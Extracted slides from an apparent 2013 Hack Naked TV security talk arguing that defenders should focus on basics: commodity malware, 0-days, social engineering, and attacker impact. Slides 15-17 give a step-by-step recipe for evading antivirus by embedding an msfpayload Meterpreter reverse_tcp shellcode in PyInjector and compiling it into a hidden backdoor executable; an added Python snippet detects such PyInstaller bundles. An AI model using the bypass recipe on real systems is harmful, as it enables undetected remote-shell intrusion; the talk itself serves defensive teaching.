3. The Need for Focus
• It is easy to get caught up in the latest “Hack of the day”
• Let’s talk about
• iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013
4. #1 Crappy Malware
• Had enough presentations on the “Not so advanced persistent threat?”
• Somehow, the belief is if we can make fun of the attackers’ skill level it makes us….???
• Better? Smarter?
• Why?
• Because…..
6. About that Malware
• It tends to be well known
• It tends to have AV signatures*
• Tracing it back to a specific group can be hard
• Anyone can download it
• It is not 1337 or even 31337
Just right
9. AV Bypass Made Easy
• Many of these tools have options to export to a raw string of hex characters
• In fact, that does not even matter
• We can use Ghost Writing techniques
• Simply exporting and re-importing as a script does the trick
• Flame did this with Lua
This and cookies: Why I pentest
14. Python Injection
• Another technique is to:
• Convert your payload into Raw output
• Import the Raw output into a python script
• Convert the Python script into an executable
• It is all because the text sections of an .exe are not being reviewed by many AV vendors
• They would have to write the signature for Python itself
• Not likely
• Great write up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass
15. Windows AV Bypass - Setup
• Create a Windows box with prerequisites
• Same as target (32-bit vs. 64-bit)
• Install Python: http://www.python.org/
• Add Python to system PATH
• Install PyWin32: http://sourceforge.net/projects/pywin32/
• Install PyInstaller: http://www.pyinstaller.org/
• Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip
16. Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any machine)
• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
• replace: shellcode = sys.argv[1]
• with: shellcode = '<msfpayload output>'
• where: <msfpayload output> = output from the above msfpayload command
17. Windows AV Bypass - Compile
• While in the PyInstaller Directory:
• python utils\Makespec.py --onefile --noconsole pyinjector.py
• python utils\Build.py pyinjector/pyinjector.spec
• New backdoor should be under:
• [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!
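The build above produces a PyInstaller one-file executable, and the slide’s point is that a string signature on the Python payload will not catch it. As an added defender-side example (not from the slides, PyInjector or PyInstaller), the Python below flags such binaries structurally instead of by payload signature: every PyInstaller bundle ends with a CArchive cookie whose magic and field layout come from PyInstaller’s own archive reader; the sample bytes are constructed here, not a real build.

```python
import struct

# Every PyInstaller one-file executable carries a CArchive "cookie" trailer whose
# first eight bytes are this magic (PyInstaller/archive/readers.py, MAGIC).
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie body after the magic: archive length, TOC offset, TOC length, python
# version (all big-endian); PyInstaller 3.x+ appends a 64-byte python library name.
COOKIE_BODY = "!IIii"

def is_pe(data: bytes) -> bool:
    """MZ stub whose e_lfanew field (offset 0x3C) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie fields if a PyInstaller trailer is present, else None."""
    idx = data.rfind(PYI_MAGIC)          # search from the end: data may be appended later
    if idx == -1 or len(data) < idx + 8 + struct.calcsize(COOKIE_BODY):
        return None
    length, toc, toclen, pyvers = struct.unpack_from(COOKIE_BODY, data, idx + 8)
    pylib = data[idx + 24:idx + 88].split(b"\x00", 1)[0].decode("ascii", "replace")
    return {"offset": idx, "archive_len": length, "toc": toc, "toc_len": toclen,
            "pyvers": pyvers, "pylib": pylib}

def classify(data: bytes) -> str:
    """'pyinstaller-pe' for a PE wrapping a PyInstaller bundle, 'pe' or 'other' otherwise."""
    if not is_pe(data):
        return "other"
    return "pyinstaller-pe" if find_pyinstaller_cookie(data) else "pe"

def build_sample() -> bytes:
    """Constructed stand-in for a PyInstaller-built .exe: minimal MZ/PE header plus cookie."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)            # e_lfanew -> 0x40
    header += b"PE\x00\x00" + b"\x00" * 0x100             # stand-in for COFF header / stub
    archive = b"\x00" * 0x200                              # would hold the bundled script
    cookie = PYI_MAGIC + struct.pack(COOKIE_BODY, len(archive) + 88, 0x100, 0x80, 27)
    cookie += b"python27.dll".ljust(64, b"\x00")           # 2.7 = the era of these slides
    return bytes(header) + archive + cookie

if __name__ == "__main__":
    sample = build_sample()
    print(classify(sample), find_pyinstaller_cookie(sample))
```

Run it over a directory of executables and you have an inventory of Python-bundled PEs to triage, which is a hunt for the attacker’s artefact on the system rather than for a payload string.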
18. Or You Could Just Choose Option 15
19. #2 0-day du Jour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?
20. Lessons
• Black-list AV is easy to bypass
• In fact, we had to do it with Poison Ivy last week
• Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as they need to be
• Which is not very advanced
21. Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system
• Get away from Black List Security
• Now
• Right now
• .. I mean after this presentation
22. #3 Users Making “Mistakes”
• How could we have a presentation without this?
• There is no way hackers would be this successful without users
• Ha Ha!!! Users are “dumb”
• Yeah..
• Right?
• Not so fast sparky
23. We are all Dumb
• Or, the pretexts for the attackers are getting really, really good
• Some SE pretexts we use are not fair
• Major insurance company and a change of coverage
• Linked-in merit badges
• If the attack is tailored, it is successful
26. Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good
27. Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on attacker actions
• Limit the damage the user can do
• Implement Firewalls
• Implement Software Restriction Policies
• Implement Internet Whitelisting
• But don’t simply believe the user is stupid
• Train them: Securing the Human
28. Conclusions
• While bright shiny objects are bright and shiny
• We need to come back to basics and fundamentals
• We lose sight of that in this industry
29. OCM at Black Hat
• Offensive Countermeasures at Black Hat 2013
• http://tinyurl.com/HNTV-BH-2013
30. End of Line
• Hack Naked TV Episodes
• http://www.hacknaked.tv
• Watch us:
• Blip.tv: http://blip.tv/securityweekly
• YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:
• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2